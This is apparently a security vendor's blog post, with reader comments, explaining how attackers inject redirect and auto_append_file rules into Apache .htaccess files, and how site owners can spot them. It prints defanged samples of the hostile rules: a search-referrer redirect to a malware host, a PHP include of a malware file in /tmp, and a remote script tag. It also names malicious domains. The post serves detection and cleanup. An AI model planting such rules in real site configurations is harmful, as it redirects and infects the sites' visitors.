• Experts Explain: .htaccess Attacks

    This is the fifth part in our series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

    In this article we will talk about a very popular attack method used to infect legitimate websites: .htaccess redirection. This technique is used by hackers to redirect users visiting compromised websites to content on another infected or imposter website.

    What is the purpose of the .htaccess file?
    Websites are powered by software called a “web server”. Web servers take requests to view web pages from browsers, like Internet Explorer, Google Chrome, or Firefox, and send it to the website visitor. There are many different web servers, including IIS and NGINX, and Apache, to name a few. The most popular being Apache.

    Many web servers have a special per-directory configuration file. On Apache, this file is named “.htaccess”. This .htaccess file specifies rules that determine how and to whom your website should be sent. For example, this file could be used to stop users from viewing certain pages, or redirect users to a specific page when they request a webpage that is under construction, for example.

    How are .htaccess files used?
    The .htaccess file can help you configure how users access pages on your website, whether they can view the contents of certain directories, whether specific web page requests are redirected to error pages (error 404 – not found) and more.

    Webmasters often use .htaccess files to block web crawlers, automated spiders and malicious bots from viewing the website content. .htaccess files can also be used to prevent “hotlinking” of images on sites (like below).

    RewriteEngine on
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} !^http://(www\.)?mysite.com/.*$ [NC]
    RewriteRule .(png|gif|jpg)$ – [F]

    How is the .htaccess file used by malicious hackers?
    Using the .htaccess file, hackers can redirect your visitors to another website. Malicious hackers often inject malicious lines of computer code in benign .htaccess files. These malicious lines of code can infect website visitors and cause user confusion.

    Before inserting the malicious code into .htaccess files, hackers will sometimes prepend a number of empty lines to make the malicious entries more difficult to notice. Ensure that you search the entire “.htaccess” file for malware, not just the lines at the top.

    What does a .htaccess file look like?
    A good example of the .htaccess file can be found here and here.

    An example:

    #AuthType basic
    #AuthName "prompt"
    #AuthUserFile /.htpasswd
    #AuthGroupFile /dev/null
    #Require valid-user
    #Require valid-user
    #Allow from
    #Satisfy Any
    ### PROTECT FILES ###
    #<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
    #  Order Allow,Deny
    #  Deny from all
    #SetEnvIfNoCase Referer "^http://subdomain.domain.tld/" good
    #SetEnvIfNoCase Referer "^$" good
    #<FilesMatch "\.(png|jpg|jpeg|gif|bmp|swf|flv)$">
    #   Order Deny,Allow
    #   Deny from all
    #   Allow from env=good
    #   ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif
    #   ErrorDocument 403 /images/you_bad_hotlinker.gif
    #LimitRequestBody 10240000 #bytes, 0-2147483647(2GB) 

    How can I identify if my .htaccess file is infected?
    Malicious code in an .htaccess file can look similar to the example below. Notice the “RewriteRule” statement tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site that matches the “RewriteCond” statements.

    This means visitors from many common search engines, including Ask, Google, MSN, and more, would be redirected to a malicious website.

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
    RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]

    Popular .htaccess attacks have directed users to: xccgtswgokoe, villusoftreit.ru, and globalpoweringgatheringon.com.

    Another technique uses the .htaccess file to modify the PHP value “auto_append_file” in a way such that a local file containing the malware is included with every request. Instead of redirection, the .htaccess is used to load malware from another local file to infect users with malware.

    An example:

    php_value auto_append_file “/tmp/661829.php”

    This configuration appends the malware contained in the file “/tmp/661829.php” to every PHP request.

    The PHP file could contain malware that resembles the example below:

    scrip src="hxxp://nicomagen.cz.cc/jquery.js"></script>

    How do I detect if my site is vulnerable?
    Monitor your site to see if there are any unexpected redirects and always keep backups of your (.htaccess) files to compare to those on your server.

    Additionally, you should scan your website for application level vulnerabilities like SQL injection and Cross Site Scripting issues. These are all security holes that malicious hackers can exploit to break into your site and infect it, spreading malware to your visitors.

    .htaccess redirection is a common vector for malicious hackers to exploit and infect websites. We have seen what .htaccess files are, how they are used by malicious hackers, and how to protect your website.

    StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    • Nice information about security of .htaccess
      Thank you for sharing.

      Posted by Ivoci on February 14th

    • […] Check .htaccess file for compromise (more information here) […]

      Posted by stopthehacker.com | Cleaning up malware-infected Wordpress sites on June 19th

    • I found the malicious code in the .htaccess file, I erased it, uploded my file again, and some minutes after, the code was back again… I tried to erase it again, and it appeared a few minutes later. Any ideas on what is causing this? I just can’t get rid of it because it keeps been injected.

      Posted by Suriplanta on October 12th

    • […] into Android” is appearing as “unsafe” for users. The attack is known as “.htaccess code injection“, and it used to redirect to spam sites. Luckily the JavaScript and PHP files of the site are […]

      Posted by About recent “.htaccess” attacks | Get into Android blog on February 17th